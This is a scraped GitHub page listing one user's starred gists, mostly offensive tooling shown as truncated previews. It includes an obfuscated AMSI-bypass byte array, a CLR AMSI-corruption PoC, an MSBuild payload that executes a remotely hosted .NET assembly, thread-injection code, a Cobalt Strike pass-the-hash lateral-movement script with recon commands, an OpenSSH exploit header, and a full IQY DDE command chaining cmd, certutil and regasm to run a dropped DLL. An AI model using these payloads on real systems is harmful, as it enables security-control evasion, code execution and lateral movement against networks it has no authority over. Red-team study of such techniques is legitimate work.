Skip to content

Instantly share code, notes, and snippets.

Dave Hardy davehardy20

  • UK
Block or report user

Report or block davehardy20

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
monoxgas / mscorlib_load_assembly.vba
Last active Oct 21, 2019
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
View mscorlib_load_assembly.vba
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
Const LS As LongPtr = 4&
View amsi-bypass.ps1
$a = @(85,87,112,80,64,64,76,64,64,64,64,68,64,64,64,64,46,46,57,64,64,77,102,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,102,64,64,64,64,64,53,103,116,102,53,64,117,64,111,79,72,99,102,67,85,76,49,105,87,70,105,113,98,120,67,118,98,108,56,111,98,108,71,117,72,70,79,105,99,108,52,119,101,66,67,104,91,82,67,120,101,86,53,102,96,86,53,102,83,68,56,85,72,70,48,119,91,70,84,116,69,80,49,74,75,64,64,64,64,64,64,64,64,64,67,80,83,80,64,64,85,64,68,69,64,77,117,66,77,109,118,64,64,64,64,64,64,64,64,64,64,78,64,64,72,104,64,77,64,85,64,64,64,64,53,64,64,64,64,70,64,64,64,64,64,64,64,64,66,104,118,64,64,64,64,102,64,64,64,64,80,64,64,64,64,64,64,64,68,64,64,102,64,64,64,64,64,102,64,64,67,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,64,64,64,64,64,64,66,64,64,64,64,64,64,102,64,64,64,64,64,64,64,64,76,64,88,72,84,64,64,67,64,64,64,67,64,64,64,64,64,64,68,64,64,64,68,64,64,64,64,64,64,64,64,67,
mehaase /
Last active May 8, 2019
SSHtranger Things Exploit POC
Title: SSHtranger Things
Author: Mark E. Haase <>
Date: 2019-01-17
CVE: CVE-2019-6111, CVE-2019-6110
Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1
We have nicknamed this "SSHtranger Things" because the bug is so old it could be
mattifestation / CorruptCLRGlobal.ps1
Created Dec 7, 2018
A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
View CorruptCLRGlobal.ps1
function Subvert-CLRAntiMalware {
A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.
clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.
G0ldenGunSec / msBuildDemo.xml
Last active Dec 12, 2019
MSBuild payload used to execute a remotely-hosted .net assembly
View msBuildDemo.xml
<Project ToolsVersion="4.0" xmlns="">
<Target Name="DemoClass">
<ClassExample />
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Code Type="Class" Language="cs">
View sedebug_rtlcreatethread.c
/*! @brief */
#include <windows.h>
#include <stdio.h>
typedef DWORD(WINAPI *prototype_RtlCreateUserThread)(
HANDLE ProcessHandle,
BOOL CreateSuspended,
ULONG StackZeroBits,
PULONG StackReserved,
realoriginal / windows10activation
Created Oct 8, 2018 — forked from amanjuman/windows10activation
Activate Windows 10 without Any Activator
View windows10activation
1. Open CMD as Administrator
2. Paste the following commands into the Cmd: One by one, follow the order.
cscript slmgr.vbs /ipk "SERIAL NUMBER HERE"
Replace SERIAL NUMBER HER with any of these, according your Windows 10 installation type.
Home/Core TX9XD-98N7V-6WMQ6-BX7FG-H8Q99
Home/Core (Country Specific) PVMJN-6DFY6-9CCP6-7BKTT-D3WVR
Home/Core (Single Language) 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH
realoriginal / smbexec_psh.cna
Last active Aug 24, 2019
Cheap solution to problems with make_token, psexec/lateral movement/sekurlsa::pth for cross-domain PTH in the same forest.
View smbexec_psh.cna
# Lateral Movement using Invoke-TheHash toolkit
# Written by Mumbai
# git clone
# mv Invoke-TheHash/Invoke-TheHash.ps1 Invoke-TheHash.ps1
# cat Invoke-TheHash/Invoke-*.ps1 >> Invoke-TheHash.ps1
beacon_command_register("smbexec_psh", "Lateral movement using Invoke-TheHash toolkit",
"Synopsis: smbexec_psh [x86/x64] [target] [listener] [username] [domain] [ntlm]\n\n",
"Run a payload on a target via Invoke-TheHash SMBExec");
HarmJ0y / cobaltstrike_sa.txt
Created Sep 28, 2018
Cobalt Strike Situational Awareness Commands
View cobaltstrike_sa.txt
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
Mr-Un1k0d3r / remote.iqy
Last active Nov 29, 2019
IQY File Remote Payload POC
View remote.iqy
=cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1'
You can’t perform that action at this time.